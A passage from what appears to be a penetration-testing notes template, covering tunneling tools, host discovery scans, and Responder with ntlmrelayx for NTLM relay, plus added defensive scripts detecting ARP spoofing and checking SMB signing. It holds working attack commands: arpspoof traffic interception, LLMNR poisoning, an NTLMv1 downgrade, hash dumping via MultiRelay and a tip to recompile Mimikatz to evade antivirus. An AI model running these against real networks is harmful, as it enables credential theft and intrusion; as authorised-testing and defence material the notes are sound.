| 2. export http://127.0.0.1:3128, export https://127.0.0.1:3128 77 | 3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128" 78 | 79 | # netsh port forwarding 80 | - netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 81 | - netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 82 | 83 | 84 | # Proxy Binaries for Windows 85 | Windows 10 has SSH (Thanks WSL!) 
plink.exe (In Kali)

# Other Tools:
- ssf: https://github.com/securesocketfunneling/ssf
- rpivot: https://github.com/klsecservices/rpivot
- hans (ICMP Tunneling): http://code.gerade.org/hans/
- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
- Dnscat2: https://github.com/iagox86/dnscat2
- Chisel: https://github.com/jpillora/chisel
- httptunnel: In Kali apt install httptunnel
- ligolo: https://github.com/sysdream/ligolo
- reGeorg: https://github.com/sensepost/reGeorg

# Other Resources:

- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
- https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md:
--------------------------------------------------------------------------------
# NetDiscover (ARP Scanning):
- netdiscover -i eth0
- netdiscover -r 172.21.10.0/24

# Dsniff Arpspoof

First enable the Linux box to act as a router:

`echo 1 > /proc/sys/net/ipv4/ip_forward`

Then run `arpspoof`:

`arpspoof -i <interface> -t <target> -r <host>`

For example, to intercept traffic between targets, use:

`arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16`

# Nmap:

- nmap -sn 172.21.10.0/24
- nmap -sn 172.21.10.1-253
- nmap -sn 172.21.10.*

You can also grep out the IPs and cut out the fluff:
```
nmap -sn 172.x.x.x/24 | grep "172" | cut -f 5 -d ' '
```

A slower, stealthier approach that uses the split IP-range files (as seen in the first section above) would be:
```
nmap --randomize-hosts -sn -T2 -oN nmap_discoveryScan_x.x.x.x-16.txt -iL x.x.x.x_IP_range.split.txt
```
This will export the results into a text file (`-oN`). Randomizing hosts is optional, depending on the customer and the testing situation. The flag `-oA` can be used in place of `-oX` or `-oN`, as `-oA` writes the results in all output formats.

The results of both commands shown above are the list of hosts that responded to the ping and are therefore up.

# Nbtscan:
- nbtscan -r 172.21.1.0/24

# Masscan
- masscan 172.21.10.0/24 --ping

# Ping Sweeps

## Linux Ping Sweep (Bash)

- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done

## Windows Ping Sweep (Run on Windows System)

- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.10.%i is up.

## Powershell Ping Sweep:
Note: This command can also run on PowerShell for Linux

- 1..20 | % {"172.21.10.$($_): $(Test-Connection -count 1 -comp 172.21.10.$($_) -quiet)"}
- Invoke-PingSweep -SubNet 172.21.10
```
# Reference: https://gist.github.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78
function ResolveIp($IpAddress) {
    try {
        (Resolve-DnsName $IpAddress -QuickTimeout -ErrorAction SilentlyContinue).NameHost
    } catch {
        $null
    }
}

function Invoke-PingSweep {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true)]
        [string]$SubNet,
        [switch]$ResolveName
    )
    # Send one asynchronous echo request (250 ms timeout) to every host in the /24
    $ips = 1..254 | ForEach-Object {"$($SubNet).$_"}
    $ps = foreach ($ip in $ips) {
        (New-Object Net.NetworkInformation.Ping).SendPingAsync($ip, 250)
        #[Net.NetworkInformation.Ping]::New().SendPingAsync($ip, 250) # or if on PowerShell v5
    }
    [Threading.Tasks.Task]::WaitAll($ps)
    $ps.Result | Where-Object -FilterScript {$_.Status -eq 'Success' -and $_.Address -like "$SubNet*"} |
    Select-Object Address,Status,RoundtripTime -Unique |
    ForEach-Object {
        if ($_.Status -eq 'Success') {
            if (!$ResolveName) {
                $_
            } else {
                $_ | Select-Object Address, @{Expression={ResolveIp($_.Address)};Label='Name'}, Status, RoundtripTime
            }
        }
    }
}
```

## Python Ping Sweep:

The following Python script can be used to perform a ping scan.
```
#!/usr/bin/env python3
from subprocess import Popen, DEVNULL

# Sweep every host of a /24 (x.x.x is a placeholder for the first three octets)
for host in range(1, 255):
    address = "x.x.x.%d" % host
    # One echo request per host; output is discarded, only the exit status matters
    response = Popen(["ping", "-c1", address], stdout=DEVNULL, stderr=DEVNULL)
    response.communicate()
    # ping exits 0 only when a reply was received
    if response.returncode == 0:
        print(address)
```
This script is written for a /24 network; modification is required for other network sizes.
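As a defensive counterpart to the Dsniff Arpspoof section above (an added example, not part of the template), the following script compares two `ip neigh` snapshots and flags the two symptoms the poisoning leaves behind on a victim: an IP whose MAC changed, and one MAC answering for several IPs. The snapshots, addresses and MACs are constructed; `parse_neigh` and `find_arp_anomalies` are names chosen here.

```python
import re
from collections import defaultdict

# Constructed `ip neigh` snapshots as seen from 192.168.4.11, before and after the
# other host 192.168.4.16 is poisoned by a machine at 192.168.4.200 (all values invented).
BEFORE = """\
192.168.4.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.4.16 dev eth0 lladdr 00:11:22:33:44:16 STALE
192.168.4.200 dev eth0 lladdr de:ad:be:ef:00:01 REACHABLE
192.168.4.77 dev eth0  FAILED
"""
AFTER = """\
192.168.4.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.4.16 dev eth0 lladdr de:ad:be:ef:00:01 REACHABLE
192.168.4.200 dev eth0 lladdr de:ad:be:ef:00:01 REACHABLE
"""

# "<ip> dev <iface> lladdr <mac> <state>"; entries without lladdr (FAILED, INCOMPLETE) are skipped
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f]{2}(?::[0-9a-f]{2}){5})\b", re.I)

def parse_neigh(text):
    """Map IP -> lower-case MAC from `ip neigh` output."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table

def find_arp_anomalies(before, after):
    """Return (changed, shared): {ip: (old_mac, new_mac)} for IPs whose MAC differs
    between the snapshots, and {mac: [ips]} for MACs answering for several IPs in the
    newer one. A shared MAC can be legitimate (router with several addresses, VRRP),
    so treat it as a lead to verify, not as proof."""
    old, new = parse_neigh(before), parse_neigh(after)
    changed = {ip: (old[ip], new[ip]) for ip in old if ip in new and old[ip] != new[ip]}
    by_mac = defaultdict(set)
    for ip, mac in new.items():
        by_mac[mac].add(ip)
    shared = {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}
    return changed, shared

if __name__ == "__main__":
    changed, shared = find_arp_anomalies(BEFORE, AFTER)
    for ip, (old_mac, new_mac) in changed.items():
        print("MAC changed for %s: %s -> %s" % (ip, old_mac, new_mac))
    for mac, ips in shared.items():
        print("MAC %s claims %s" % (mac, ", ".join(ips)))
```

Feeding it real snapshots (`ip neigh` captured a few minutes apart) from a host that should only ever see the gateway's MAC for the gateway IP turns the check into a cheap periodic alarm.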
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md:
--------------------------------------------------------------------------------
# Source:

https://github.com/lgandx/Responder

# Tools in Responder:

Location: /usr/share/Responder/tools

# Make changes to config to turn off services:

`nano /usr/share/responder/Responder.conf`

# Configuring MultiRelay:
In Kali Linux:
1. pip install pycryptodome
2. Install Mingw and create the MultiRelay binaries:
```
sudo apt-get install gcc-mingw-w64-x86-64
sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv
sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode
```
3. python3 MultiRelay.py
```
Usage:
responder-MultiRelay -t 10.20.30.40 -u Administrator lgandx admin
responder-MultiRelay -t 10.20.30.40 -u ALL

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -t 10.20.30.45        Target server for SMB relay.
  -p 8081               Additional port to listen on, this will relay for
                        proxy, http and webdav incoming packets.
  -u, --UserToRelay     Users to relay. Use '-u ALL' to relay all users.
  -c whoami, --command=whoami
                        Single command to run (scripting)
  -d, --dump            Dump hashes (scripting)
```

# Starting Responder:

- responder -I [Interface] -A
- responder -I [Interface] -i [IP Address] or -e [External IP] -A

## Starting Responder in Basic Authentication Mode
- responder -I [Interface] -wdF -b

## Force NTLM Authentication to version 1 instead of version 2:
- responder -I [Interface] -wdF --lm --disable-ess

## External IP Poisoning
- responder -I [Interface] -e 172.21.1.2

## DNS Injection in DHCP Responses
- responder -I [Interface] -D

# Using Responder-RunFinger to verify whether SMB Signing is enabled

- responder-RunFinger -i 172.21.0.0/24
- python3 RunFinger.py -i 172.21.0.0/24

# Using Responder-MultiRelay
Tips:
MultiRelay uses the default version of Mimikatz, which is easily flagged by AV. It is recommended to compile your own custom version and use it with MultiRelay.
Do not run MultiRelay against targets that have SMB message signing enabled:

- responder-MultiRelay -t 172.21.0.0 -u ALL
- python3 MultiRelay.py -t 172.21.0.0 -u ALL

# Using Responder with Impacket-Ntlmrelayx
ntlmrelayx is an Impacket script for conducting NTLM relay attacks: it starts SMB and HTTP servers and relays the captured authentication to various other protocols (SMB, HTTP, LDAP, etc.).

1. When you are using Responder to capture challenges and relay them to ntlmrelayx, you will need to turn off HTTP and SMB in Responder.conf. Also have a list of which systems are running SMB with signing disabled.

2. Set up a SOCKS proxy entry on port 1080. This proxy entry routes traffic through ntlmrelayx's SOCKS server.
- sudo nano /etc/proxychains4.conf
```
[ProxyList]
# NtlmRelayX Socks Proxy
socks4 127.0.0.1 1080
# Other Proxies
```
3. Run Responder and ntlmrelayx to watch the magic happen:
- sudo Responder -I [Interface]
- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt
- ntlmrelayx.py -socks -smb2support -tf smb-targets.txt

To view the full list of captured sessions from ntlmrelayx:
```
ntlmrelayx> socks
Protocol  Target         Username              Port
--------  -------------  --------------------  ----
SMB       172.21.48.38   SPAWN/MSIMMONS        445
SMB       172.21.48.230  FAERIE/ADMINISTRATOR  445
SMB       172.21.48.230  FAERIE/ALSIMMONS      445
```

# References:

- https://github.com/lgandx/Responder

--------------------------------------------------------------------------------
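What the RunFinger and "SMB message signing" checks in the Responder notes above actually test is the SecurityMode field of the SMB2 NEGOTIATE response; the following added example (not code from Responder or Impacket) parses that field from a captured response and reports whether signing is merely enabled or actually required, which is the setting that stops a relayed session. The response builder, its constructed values, and the function names are assumptions made here so the parser runs offline.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on every response
SIGNING_ENABLED = 0x0001                  # SecurityMode bits (MS-SMB2 2.2.4)
SIGNING_REQUIRED = 0x0002

def build_negotiate_response(security_mode, dialect=0x0311):
    """Constructed minimal SMB2 NEGOTIATE response (64-byte header + 65-byte body).
    Only the fields the parser reads carry meaningful values; the rest are zeroed."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 0x80, 0, 0)
    return header + body + b"\x00"  # one-byte Buffer, hence StructureSize 65

def smb2_signing_status(packet):
    """Return dialect and signing flags from a raw SMB2 NEGOTIATE response.
    SMB2 servers always advertise SIGNING_ENABLED; only SIGNING_REQUIRED makes
    the server reject the unsigned session a relay would set up."""
    if len(packet) < 70 or packet[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    command, = struct.unpack_from("<H", packet, 12)
    flags, = struct.unpack_from("<I", packet, 16)
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", packet, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % body_size)
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }

def relay_exposed(status):
    """True when the host would accept a relayed NTLM session (signing not required)."""
    return not status["signing_required"]

if __name__ == "__main__":
    for mode in (SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        st = smb2_signing_status(build_negotiate_response(mode))
        print("dialect 0x%04x signing_required=%s relay_exposed=%s"
              % (st["dialect"], st["signing_required"], relay_exposed(st)))
```

On a real capture, feed `smb2_signing_status` the SMB2 message that follows the 4-byte NetBIOS session header; a host that reports `signing_required=False` belongs on the remediation list rather than in smb-targets.txt.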